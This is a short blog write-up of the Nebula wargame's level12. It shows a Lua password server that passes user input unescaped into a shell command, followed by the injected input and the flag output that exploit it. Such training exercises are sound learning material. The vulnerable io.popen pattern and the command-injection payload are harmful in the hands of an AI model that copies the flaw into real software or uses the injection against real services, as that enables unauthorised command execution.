Friday, November 2, 2012

exploit-exercises Nebula: level12

This time with level12  of Nebula wargame. The source code of flag12 is provided
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))
function hash(password)
prog = io.popen("echo "..password.." | sha1sum", "r") data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
end

while 1 do
local client = server:accept()
client:send("Password: ")
client:settimeout(60)
local line, err = client:receive()
if not err then
print("trying " .. line) -- log from where ;\
local h = hash(line)
if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
client:send("Better luck next time\n");
else
client:send("Congrats, your token is 413**CARRIER LOST**\n")
end
end
client:close()
end
Not much explanation is needed for this challenge. We have an os command injection vulnerability that we will exploit by terminating the echo command, executing /bin/getflag, and commenting out the remaining part of the command.
level12@nebula:~$ nc localhost 50001
Password: "";/bin/getflag > /tmp/pwnie12;#
Better luck next time
level12@nebula:~$ cat /tmp/pwnie12
You have successfully executed getflag on a target account

No comments:

Post a Comment